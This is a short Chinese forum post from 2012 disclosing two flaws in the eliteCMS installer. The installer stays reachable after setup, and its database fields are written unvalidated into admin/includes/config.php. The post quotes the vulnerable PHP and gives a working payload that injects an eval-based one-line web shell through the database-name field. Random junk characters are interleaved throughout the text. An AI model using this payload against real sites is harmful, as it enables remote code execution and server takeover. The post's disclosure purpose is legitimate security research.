eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装- n7 a3 F( j- v- ]
: _( y+ ~+ h% n% N8 Z另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
1 [6 n/ g, L! c我们来看代码:
. v0 x& y# X, I
8 J. l2 M! b$ {7 x# u...% @( e" b5 i1 D$ f! ?
elseif ($_GET['step'] == "4") {/ D; Q6 Y0 C' M
$file = "../admin/includes/config.php";
7 Y6 ^8 d, a- j0 ^$ r9 v $write = "<?php\n";( n: K4 X. n* s# @* t7 B, r' X/ A
$write .= "/**\n";9 `1 F$ B+ [% ^+ m" Q+ g, c* Y, i* f
$write .= "*\n";
4 p" u5 H& h! K+ S' }: X $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";% v0 L6 m, Z# L- @* H* y
...略...
\! d8 x. M7 V% {3 q0 W $write .= "*\n";/ O$ V2 f5 B2 P: T4 ]9 u8 E
$write .= "*/\n";
0 j/ x6 ]8 Q" z4 z$ R2 z; G $write .= "\n";9 f. @. ?2 v# J0 a
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
9 M, a( H8 E4 A% I% Z $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n"; y$ w; y5 Y/ w1 M9 ~- V
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
+ w; Y4 M( w4 B/ O. r3 U $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
* H, f5 D/ ^% j1 l% c6 f% v2 i $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";8 [/ U, w* {0 o+ l
$write .= "if (!\$connection) {\n";) q+ b, O/ Q/ d C
$write .= " die(\"Database connection failed\" .mysql_error());\n";
7 D2 f" Z, D3 X" _$ @ W _9 |( U $write .= " \n"; {2 J, w2 q& ~0 h7 P( n& Q
$write .= "} \n";
( q: G5 b i) N9 I' K& E $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";. ]' ]) S' E( I) ^- K- |
$write .= "if (!\$db_select) {\n";
, b0 u# X: K& A0 I) [% k, B $write .= " die(\"Database select failed\" .mysql_error());\n";6 t- K6 C0 |9 c
$write .= " \n";( i/ b. E f/ b
$write .= "} \n";; q8 q6 D4 d7 N$ ?9 z& C I/ Q# ]
$write .= "?>\n"; g P) y0 o0 w! B( b
2 P: {5 @+ D, F $writer = fopen($file, 'w');
5 D4 ~3 ^: A, r Y) {/ b1 {+ K4 H...
6 c: _2 \, k- J* p. @" b # k" v J* j9 Q9 V0 L5 H; H( Z- b
在看代码:+ O% w! ^5 i J5 c
6 y/ ? y' Z. [$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
5 A/ ]' P* W1 N2 `# v* h% k) W$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
' k" W: B* A N% O) M$_SESSION['DB_USER'] = $_POST['DB_USER'];
% z9 I1 L2 Z$ e3 v; f7 I$_SESSION['DB_PASS'] = $_POST['DB_PASS'];& ]4 G: Q9 W+ \* ~2 s+ W
9 A5 l8 W- E) o' ]# n7 A( H9 |
取值未作任何验证4 ^. s9 q7 f( q$ }7 B( L! n1 m) w
如果将数据库名POST数据:. S* p1 T8 B7 a z6 D4 A
7 h" N; u( W6 B8 X3 v' d4 T
"?><?php eval($_POST[c]);?><?php
& |+ B; u; }( _. q, E2 K
2 j" d0 W% a6 B, {) P+ |将导致一句话后门写入/admin/includes/config.php
0 F9 {3 G6 V& n t O; h |
发表于 2012-11-18 13:59:27
收藏
支持
反对